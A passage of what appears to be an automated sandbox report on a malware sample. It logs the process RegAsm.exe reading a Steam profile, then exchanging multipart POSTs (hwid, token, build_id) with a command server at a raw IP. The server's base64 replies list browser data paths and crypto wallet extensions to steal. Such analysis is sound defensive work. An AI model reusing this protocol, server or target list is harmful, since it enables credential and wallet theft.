                                                                              May 17, 2024 18:06:48.890995979 CEST49729443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:48.891052961 CEST4434972995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:48.891122103 CEST49729443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:48.892046928 CEST49729443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:48.892174006 CEST4434972995.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:48.892246962 CEST49729443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:49.998675108 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:49.998749971 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:49.998836040 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:49.999555111 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:49.999589920 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.047260046 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.047446966 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.048888922 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.048899889 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.049138069 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.049192905 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.049660921 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.049741983 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.049772024 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.049856901 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.049889088 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.050060987 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.050110102 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:51.050175905 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:51.050193071 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.015265942 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.015449047 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.015474081 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.015620947 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.020004034 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.020059109 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.020126104 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.022356987 CEST49731443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.022392035 CEST4434973195.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.034013033 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.034102917 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:53.034703970 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.035114050 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:53.035186052 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:54.221606016 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:54.221698046 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:54.225230932 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:54.225280046 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:54.225676060 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:54.225689888 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:55.472472906 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:55.472585917 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:55.472593069 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:55.472656965 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:55.472816944 CEST49732443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:55.472856998 CEST4434973295.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:55.474301100 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:55.474329948 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:55.474400997 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:55.474612951 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:55.474627018 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:56.697175980 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:56.697277069 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:56.697750092 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:56.697757006 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:56.697892904 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:56.697896957 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:57.884044886 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:57.884161949 CEST4434973395.217.240.101192.168.2.5
                                                                              May 17, 2024 18:06:57.884187937 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:57.884227037 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:57.884481907 CEST49733443192.168.2.595.217.240.101
                                                                              May 17, 2024 18:06:57.884496927 CEST4434973395.217.240.101192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              May 17, 2024 18:05:50.215388060 CEST6543953192.168.2.51.1.1.1
                                                                              May 17, 2024 18:05:50.261188984 CEST53654391.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              May 17, 2024 18:05:50.215388060 CEST192.168.2.51.1.1.10xb9ddStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              May 17, 2024 18:05:50.261188984 CEST1.1.1.1192.168.2.50xb9ddNo error (0)steamcommunity.com104.102.42.29A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • steamcommunity.com
                                                                              • 95.217.240.101

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549704104.102.42.294431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:05:51 UTC119OUTGET /profiles/76561199686524322 HTTP/1.1
                                                                              Host: steamcommunity.com
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:05:52 UTC1870INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              Cache-Control: no-cache
                                                                              Date: Fri, 17 May 2024 16:05:52 GMT
                                                                              Content-Length: 34771
                                                                              Connection: close
                                                                              Set-Cookie: sessionid=fe48e086f4e0dfc5754b8ed4; Path=/; Secure; SameSite=None
                                                                              Set-Cookie: steamCountry=US%7C5bf5a7430694e6b05582a94131e2eb3f; Path=/; Secure; HttpOnly; SameSite=None
                                                                              2024-05-17 16:05:52 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                              2024-05-17 16:05:52 UTC16384INData Raw: 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0d 0a 09 09 09 09 09 53 55 50 50 4f 52 54 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61
                                                                              Data Ascii: <a class="menuitem supernav" href="https://help.steampowered.com/en/">SUPPORT</a></div><script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': fa
                                                                              2024-05-17 16:05:52 UTC3768INData Raw: 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74
                                                                              Data Ascii: "{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script
                                                                              2024-05-17 16:05:52 UTC105INData Raw: 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: ></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.54970595.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:05:54 UTC233OUTGET / HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:05:55 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:05:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:05:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.54970695.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:05:56 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----HIIEGHJJDGHCAKEBGIJK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 278
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:05:56 UTC278OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 32 37 33 30 45 36 31 36 39 31 39 32 32 30 36 33 34 39 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 47 48 4a 4a 44 47 48 43 41 4b 45 42 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 48
                                                                              Data Ascii: ------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="hwid"7B2730E61691922063497-a33c7340-61ca-11ee-8c18-806e6f6e6963------HIIEGHJJDGHCAKEBGIJKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------H
                                                                              2024-05-17 16:05:58 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:05:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:05:58 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 3a1|1|1|0|4deb78246c010994d1326c4b8d4942b2|1|1|1|0|0|50000|00


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.54970795.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:05:59 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----CAKKEGDGCGDAKEBFIJEC
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:05:59 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 41 4b 4b 45 47 44 47 43 47 44 41 4b 45 42 46 49 4a 45 43 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------CAKKEGDGCGDAKEBFIJECContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CAKKEGDGCGDAKEBFIJECCont
                                                                              2024-05-17 16:06:01 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:00 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:01 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                              Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.54970895.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:02 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----CFIECBFIDGDAKFHIEHJK
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:02 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 43 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------CFIECBFIDGDAKFHIEHJKContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------CFIECBFIDGDAKFHIEHJKCont
                                                                              2024-05-17 16:06:04 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:04 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                              Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.54970995.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-17 16:06:05 UTC325OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDH
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                              Host: 95.217.240.101
                                                                              Content-Length: 332
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-17 16:06:05 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 65 62 37 38 32 34 36 63 30 31 30 39 39 34 64 31 33 32 36 63 34 62 38 64 34 39 34 32 62 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"4deb78246c010994d1326c4b8d4942b2------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------IDBAKKECAEGCAKFIIIDHCont
                                                                              2024-05-17 16:06:07 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Fri, 17 May 2024 16:06:06 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-17 16:06:07 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.54971095.217.240.1014431600C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
